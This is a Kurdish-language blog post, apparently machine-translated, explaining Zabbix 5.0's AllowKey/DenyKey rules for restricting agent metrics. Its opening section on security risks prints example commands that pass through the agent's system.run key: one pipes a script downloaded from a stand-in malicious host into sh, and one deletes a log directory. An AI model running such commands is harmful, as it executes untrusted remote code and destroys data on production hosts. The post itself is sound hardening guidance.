ProHoster > Blog > Rêveberî > Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Piştgiriya lîsteya reş û spî ji bo metrîkên alîgirê ajan

Tikhon Uskov, Endezyarê Entegrasyonê, Zabbix

Pirsgirêkên ewlehiya daneyê

Zabbix 5.0 xwedan taybetmendiyek nû ye ku destûrê dide te ku ewlehiya pergalên ku bi Zabbix Agent bikar tînin baştir bikin û pîvana kevn diguhezîne. RemoteCommands çalak bike.

Pêşveçûnên di ewlehiya pergalên-based ajan de ji vê rastiyê derdikevin ku karmendek dikare hejmareke mezin ji kiryarên potansiyel xeternak pêk bîne.

  • Agent dikare hema hema her agahdarî, tevî agahdariya nepenî an potansiyel xeternak, ji pelên veavakirinê, pelên têketinê, pelên şîfreyê an pelên din berhev bike.

Mînakî, bi karanîna kargêriya zabbix_get hûn dikarin xwe bigihînin navnîşek bikarhêneran, navnîşên wan ên malê, pelên şîfreyê, hwd.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Gihîştina daneyan bi karanîna kargêriya zabbix_get

NOTE. Dane tenê dikare were vegerandin heke ajan destûrnameyên xwendinê li ser pelê têkildar hebe. Lê, wek nimûne, pelê /etc/passwd/ ji hêla hemî bikarhêneran ve tê xwendin.

  • Ajan di heman demê de dikare fermanên potansiyel xeternak bicîh bîne. Mînakî, key *system.run[]** destûrê dide te ku hûn fermanên dûr li ser girêkên torê bicîh bînin, di nav de skrîptên ji navbeynkariya webê ya Zabbix ku di heman demê de fermanan li aliyê agentê jî bicîh dikin. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Li Linux-ê, ajan ji hêla xwerû ve bêyî mafên root-ê dimeşîne, dema ku li ser Windows-ê ew wekî karûbar wekî Pergalê dimeşîne û xwedan gihandina bêsînor a pergala pelan e. Li gorî vê yekê, heke piştî sazkirinê di parametreyên Zabbix Agent de guheztin çênebe, ajan xwedan qeyd, pergala pelan e û dikare pirsên WMI-yê bicîh bîne.

Di guhertoyên berê de parametre EnableRemoteCommands=0 destûr tê dayîn ku tenê metrîkên bi mifteyê neçalak bike *system.run[]** û ji navgîniya webê nivîsan dimeşîne, lê rêyek tunebû ku meriv gihîştina pelên kesane bisînor bike, bişkojkên takekesî yên ku bi nûnerê re hatine saz kirin destûr an neçalak bike, an jî karanîna pîvanên kesane sînordar bike.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Di guhertoyên berê yên Zabbix de parametreya EnableRemoteCommand bikar bînin

AllowKey/DenyKey

Zabbix 5.0 bi peydakirina navnîşên spî û lîsteyên reş ji bo destûrkirin û înkarkirina metrîkên li aliyê ajansê, li dijî gihîştina nedestûrî ya weha diparêze.

Di Zabbix 5.0 de hemî bişkok, tevî *system.run[]** çalak in, û du vebijarkên veavakirina nûnerê nû hatine zêdekirin:

AllowKey= - kontrolên destûr;

DenyKey= - kontrolên qedexekirî;

li ku derê qalibek navekî sereke ya bi pîvanên ku metacharacters (*) bikar tîne heye.

Bişkojkên AllowKey û DenyKey dihêlin ku hûn li ser bingeha nimûneyek taybetî destûr bidin an metrîkên kesane red bikin. Berevajî pîvanên mîhengê yên din, hejmara parametreyên AllowKey/DenyKey ne tixûbdar e. Ev rê dide we ku hûn bi zelalî diyar bikin ka ajan bi rastî dikare di pergalê de çi bike bi afirandina dara kontrolê - bişkokên darvekirî, ku rêza ku ew tê de têne nivîsandin rolek pir girîng dilîze.

Sequence qaîdeyên

Rêbaz bi rêza ku ew di pelê veavakirinê de têne kontrol kirin. Mifta berî maça yekem li gorî qaîdeyan tê kontrol kirin, û gava ku mifteya elementa daneyê bi şêwazê re têkildar be, destûr tê dayîn an red kirin. Piştî vê yekê, kontrolkirina qaîdeyê disekine û bişkokên mayî têne paşguh kirin.

Ji ber vê yekê, heke hêmanek hem bi destûrek û hem jî bi rêgezek redkirinê re têkildar be, encam dê bi kîjan qaîdeyê yekem di pelê veavakirinê de ye ve girêdayî be.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

2 qaîdeyên cuda bi heman şêweyê û mifteyê vfs.file.size[/tmp/file]

Rêza bikaranîna bişkokên AllowKey/DenyKey:

  1. qaîdeyên rast
  2. qaîdeyên giştî,
  3. hukmê qedexe.

Mînakî, heke hewcedariya we bi gihîştina pelên di peldankek diyar de hebe, divê hûn pêşî destûr bidin ku bigihîjin wan, û dûv re her tiştê din ên ku di nav destûrên sazkirî de nebin înkar bikin. Ger pêşî qaîdeya înkarkirinê were bikar anîn, dê gihîştina peldankê were red kirin.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Rêzeya rast

Heke hûn hewce ne ku destûrê bidin ku 2 karûbar bi rêya *system.run[]**, û qaîdeya redkirinê dê pêşî were destnîşan kirin, karûbar dê neyên destpêkirin, ji ber ku nimûneya yekem dê her gav bi her kilîtê re têkildar be, û qaîdeyên paşê dê bêne paşguh kirin.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Rêzeya çewt

Patterns

Rêbazên bingehîn

Pattern bi tîpên hovane îfadeyek e. Metakarakter (*) her jimarek her tîpan li cîhek taybetî li hev dike. Metacharacters hem di nav navê key hem jî di pîvanan de têne bikar anîn. Mînakî, hûn dikarin pîvana yekem bi nivîsê bi hişkî diyar bikin, û ya paşerojê wekî pîvaz diyar bike.

Pêdivî ye ku parametre di nav kevaneyên çargoşe [] de bêne girtin.

  • system.run[* - nerast
  • vfs.file*.txt] - nerast
  • vfs.file.*[*] - rast

Mînakên bikaranîna wildcard.

  1. Di navê key û di parametreyê de. Di vê rewşê de, mift bi mifteyek wekhev a ku pîvanek tê de nîne re têkildar nabe, ji ber ku di nimûneyê de me destnîşan kir ku em dixwazin dawiya navekî diyarkirî û komek hin pîvanan bistînin.
  2. Heger nimûne kemberên çargoşe bikar neyîne, şablon destûrê dide hemî bişkokên ku pîvanan tê de nînin û hemî bişkokên ku pîvana diyarkirî dihewîne red dike.
  3. Heke mift bi tevahî were nivîsandin û pîvan wekî qerta hovane bêne destnîşan kirin, ew ê mifteya mîna hev bi her pîvanan re li hev bike û dê mifteya bê çargoşe li hev neke, ango dê were destûr kirin an red kirin.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Rêbazên dagirtina pîvanan.

  • Ger tê xwestin ku kilîtek bi parameteran were bikar anîn, pêdivî ye ku pîvan di pelê veavakirinê de bêne diyar kirin. Pêdivî ye ku pîvan wekî metakarakter were destnîşan kirin. Pêdivî ye ku meriv bi baldarî gihîştina her pelê red bike û li ber çavan bigire ka kîjan agahdariya ku metrîk dikare di bin tîpên cûda de peyda bike - bi û bê parametre.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Taybetmendiyên nivîsandina kilîtên bi pîvanan

  • Ger mifteyek bi pîvanan were destnîşan kirin, lê parametre vebijarkî bin û wekî metakarakter werin destnîşan kirin, dê mifteyek bê parametre were çareser kirin. Mînakî, heke hûn dixwazin wergirtina agahdariya li ser barkirina CPU-yê neçalak bikin û diyar bikin ku divê mifteya system.cpu.load[*] neçalak bibe, ji bîr nekin ku mifteya bê parametre dê nirxa barkirinê ya navînî vegerîne.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Rêbazên dagirtina parametreyan

Nîşe

ligorî

  • Hin rêzik ji hêla bikarhêner ve nayê guheztin, mînakî, qaîdeyên vedîtinê an qaîdeyên qeydkirina otomatîkî ya nûnerê. Rêbazên AllowKey/DenyKey bandorê li ser pîvanên jêrîn nakin:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

NOTE. Ger rêveberek mifteyek neçalak bike, dema ku jê were pirsîn, Zabbix agahdarî nade ka çima metrîk an mifteyek dikeve kategoriya 'NE PIŞTGIRTIN'. Agahdariya li ser qedexeyên li ser pêkanîna fermanên dûr jî di pelên têketinê yên ajanê de nayê xuyang kirin. Ev ji ber sedemên ewlehiyê ye, lê heke metrîk ji ber hin sedeman bikeve nav kategoriyek nepiştgiriyek, dikare xeletkirinê tevlihev bike..

  • Pêdivî ye ku hûn ji bo girêdana pelên mîhengê yên derveyî (mînakek, bi rêza alfabetîk) pişta xwe bi ti fermanek taybetî negirin.

Command Line Utilities

Piştî sazkirina qaîdeyan, hûn hewce ne ku pê ewle bin ku her tişt rast hatî mîheng kirin.

Hûn dikarin yek ji sê vebijarkan bikar bînin:

  • Metrîkek li Zabbix zêde bikin.
  • Test bi zabbix_agentd. Nûnerê Zabbix bi vebijark -çapkirin (-p) Hemî bişkokan (yên ku ji hêla xwerû ve têne destûr kirin) nîşan dide ji bilî yên ku ji hêla veavakirinê ve destûr nedaye. Û bi vebijêrkê -test (-t) ji bo kilîtek qedexe dê vegere 'Mifteya maddeya ku nayê piştgirî kirin'.
  • Test bi zabbix_get. Utility zabbix_get bi vebijêrk -k dê vegere'ZBX_NOTSUPPORTED: Metrîka nenas'.

Destûr bide an înkar bike

Hûn dikarin gihîştina pelê red bikin û, mînakî, bi karanîna karûbar verast bikin zabbix_getku gihîştina dosyayê tê red kirin.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

**

NOTE. Gotinên di parametreyê de têne paşguh kirin.

Di vê rewşê de, gihîştina pelek wusa dikare bi rêyek cûda ve were destûr kirin. Mînakî, heke sîmlinkek jê re bibe.

Piştgiriya lîsteya reş û spî ya ji bo metrîkên alîgirê li Zabbix 5.0

Tête pêşniyar kirin ku ji bo sepandina qaîdeyên diyarkirî vebijarkên cihêreng kontrol bikin, û her weha îmkanên dorpêçkirina qedexeyan jî bihesibînin.

Pirs û bersiv

di pirsa. Çima ji bo danasîna rêgez, destûr û qedexeyan qaîdeyek weha tevlihev bi zimanê xwe hate hilbijartin? Çima ne gengaz bû ku, mînakî, bêjeyên birêkûpêk ên ku Zabbix bikar tîne bikar bînin?

Bersiv. Ev pirsgirêkek performansa regex e ji ber ku bi gelemperî tenê yek nûnerek heye û ew hejmareke mezin a metrîkan kontrol dike. Regex operasyonek pir giran e û em nikanin bi vî rengî bi hezaran pîvanan kontrol bikin. Wildcards - çareseriyek gerdûnî, berfireh û hêsan e.

di pirsa. Ma pelên Include ne bi rêza alfabetîk in?

Bersiv. Bi qasî ku ez dizanim, heke hûn qaîdeyan li pelên cihêreng belav bikin, bi rastî ne gengaz e ku meriv rêza ku qaîdeyên ku dê werin sepandin pêşbîn bike. Ez pêşniyar dikim ku hemî qaîdeyên AllowKey/DenyKey di pelek Include de berhev bikin, ji ber ku ew bi hev re têkilî dikin, û vê pelê jî tê de.

di pirsa. Di Zabbix 5.0 de vebijêrk 'EnableRemoteCommands=' di pelê veavakirinê de winda ye, û tenê AllowKey/DenyKey heye?

Bersiv. Erê rast e.

Ji bo baldariya te spas!

Source: www.habr.com